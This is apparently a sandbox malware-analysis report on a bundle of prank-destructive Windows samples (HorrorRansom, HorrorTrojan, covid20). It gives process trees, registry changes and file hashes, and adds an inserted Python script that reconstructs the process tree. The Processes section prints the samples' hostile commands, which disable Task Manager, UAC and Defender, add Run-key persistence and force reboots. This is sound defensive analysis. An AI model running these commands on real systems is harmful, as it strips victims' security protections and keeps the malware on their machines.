Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "55" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
PID 2072 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
PID 2072 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
PID 2072 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
PID 2072 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
PID 2072 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
PID 2072 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
PID 2072 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
PID 2072 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
PID 2072 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
PID 2072 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
PID 2072 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
PID 2116 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 4780 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe C:\Windows\system32\DllHost.exe
PID 4780 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe C:\Windows\system32\DllHost.exe
PID 4780 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe C:\Windows\system32\DllHost.exe
PID 3408 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1516 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 1516 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 3408 wrote to memory of 1420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
PID 572 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
PID 572 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
PID 3408 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
PID 572 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
PID 572 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
PID 3408 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 572 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 572 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 3408 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 3408 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 3408 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 5032 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 5032 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 5032 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 828 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 828 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 828 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 828 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
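Each row above pairs a writer PID with the process it wrote to, and in this report those pairs follow the spawn chain that the Processes list shows (the batch launcher cmd.exe at PID 2072 starts the five droppers, each of which spawns its own cmd.exe, reg.exe, wscript.exe and DllHost.exe children). Reconstructing that tree from the flattened rows, as an added example that is not part of the sandbox report (function names are mine; the sample rows are copied from the table, with only the first triplet of repeated rows kept):

```python
import re
from collections import defaultdict

# Constructed sample input: rows from the "Suspicious use of WriteProcessMemory"
# table above, in the sandbox's flattened "Description Indicator Process Target"
# layout. The report repeats most rows three times (one per write); only the
# first triplet is kept here so the sample stays short.
SAMPLE_ROWS = r"""
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
PID 2072 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
PID 2072 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
PID 2072 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
PID 2072 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
PID 2116 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe C:\Windows\SysWOW64\cmd.exe
PID 4780 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe C:\Windows\system32\DllHost.exe
PID 3408 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1516 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 3408 wrote to memory of 1420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3408 wrote to memory of 3096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
PID 3408 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 4088 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
PID 3408 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 572 wrote to memory of 2108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WScript.exe
PID 3408 wrote to memory of 3152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 5032 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 828 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
PID 828 wrote to memory of 5052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 828 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\DllHost.exe
"""

# Both image paths start with "C:\", so a non-greedy first group stops at the
# second path even when a path contains spaces ("HorrorRansom 1.0 Final.exe").
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\.+?) (C:\\.+)$")


def parse_events(text):
    """Parse flattened rows into (writer_pid, target_pid, writer_image, target_image)."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            src, dst, src_img, dst_img = m.groups()
            events.append((int(src), int(dst), src_img, dst_img))
    return events


def build_tree(events):
    """children[parent][child] = number of writes; images[pid] = image paths the report gave that PID."""
    children = defaultdict(dict)
    images = defaultdict(set)
    for src, dst, src_img, dst_img in events:
        children[src][dst] = children[src].get(dst, 0) + 1
        images[src].add(src_img)
        images[dst].add(dst_img)
    return children, images


def roots(children):
    """PIDs that write to others but are never written to: the top of each chain."""
    written_to = {c for kids in children.values() for c in kids}
    return sorted(p for p in children if p not in written_to)


def ambiguous_pids(images):
    """PIDs the report attributes to more than one image (PID reuse or an inconsistent row)."""
    return sorted(p for p, imgs in images.items() if len(imgs) > 1)


def render_tree(children, images, pid, depth=0, count=0):
    """Indented lines, one per node, with the write count when a parent wrote more than once."""
    name = " | ".join(sorted(p.rsplit("\\", 1)[-1] for p in images[pid]))
    suffix = f" (x{count})" if count > 1 else ""
    lines = [f"{'  ' * depth}{pid} {name}{suffix}"]
    for child, n in children.get(pid, {}).items():
        lines.extend(render_tree(children, images, child, depth + 1, n))
    return lines


if __name__ == "__main__":
    ev = parse_events(SAMPLE_ROWS)
    ch, im = build_tree(ev)
    for r in roots(ch):
        print("\n".join(render_tree(ch, im, r)))
    print("PIDs with more than one image:", ambiguous_pids(im))
```

On this sample the only root is 2072 and the only PID with two images is 572, which the report lists as DllHost.exe when covid20.exe writes to it and as SysWOW64\cmd.exe when it spawns CLWCP.exe, flasher.exe and WScript.exe; that is the kind of attribution gap to resolve against the Processes list before quoting a parent-child relationship in an incident write-up.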

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"

C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe

"covid20.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe

"HorrorBob2.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe

"HorrorRansom 1.0 Final.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe

"HorrorTrojan Ultimate Edition.exe"

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe

"HorrorTrojan123.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe

clwcp c:\covid20\bg.bmp

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe

flasher 5 c:\covid20\covid.bmp

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Network

Files

memory/4780-0-0x0000000000400000-0x0000000001A7B000-memory.dmp

memory/2116-1-0x0000000000400000-0x0000000000A12000-memory.dmp

memory/5032-2-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd

MD5 47f426fb3883f2da30e9aa2a7d693fa5
SHA1 50d843d68817717f21ba96d26a571ad996a5e35a
SHA256 b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b
SHA512 2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb

C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs

MD5 a0679dce64fcf875f4208b823d4b85c0
SHA1 85abe3673db82bfe5b2c207dc98648e32afffea0
SHA256 85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1
SHA512 1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe

MD5 c875f76e521f520404401122bd82630a
SHA1 3b1c78420a55b9a768b28168753c4e22982421ef
SHA256 a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11
SHA512 b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b

C:\Users\Admin\AppData\Local\Temp\C18B.tmp\note.bmp

MD5 ed30c76a614ec8db5e4ac22e2929f53d
SHA1 27ab24ede0ec37cedd2cbf4d9f7135375f031fa4
SHA256 96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a
SHA512 ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat

MD5 b08e02e536917f897acb2d21f42f0a97
SHA1 a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45
SHA256 2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c
SHA512 1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\bg.bmp

MD5 cb065726febf9c1a581f3008e678f524
SHA1 f9a0058a57213cf7ce72eddf0616a938c8f4f4b1
SHA256 d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f
SHA512 b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bmp

MD5 738bbd119d8877f8342e1ff00fe60dff
SHA1 fc11d85e3c5b46bd877e06985fec1a601ce396ed
SHA256 548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb
SHA512 f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe

MD5 e62ee6f1efc85cb36d62ab779db6e4ec
SHA1 da07ec94cf2cb2b430e15bd0c5084996a47ee649
SHA256 13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a
SHA512 8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe

MD5 9254ca1da9ff8ad492ca5fa06ca181c6
SHA1 70fa62e6232eae52467d29cf1c1dacb8a7aeab90
SHA256 30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6
SHA512 a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs

MD5 e61624dced063c4ba5352bf487f12410
SHA1 40bd08928900cd97f444ffaa78d93dcaf913b274
SHA256 82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3
SHA512 2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac

memory/752-78-0x0000000000400000-0x0000000000484000-memory.dmp

memory/4088-77-0x0000000000400000-0x00000000004A4000-memory.dmp

memory/4780-79-0x0000000000400000-0x0000000001A7B000-memory.dmp

memory/2116-81-0x0000000000400000-0x0000000000A12000-memory.dmp

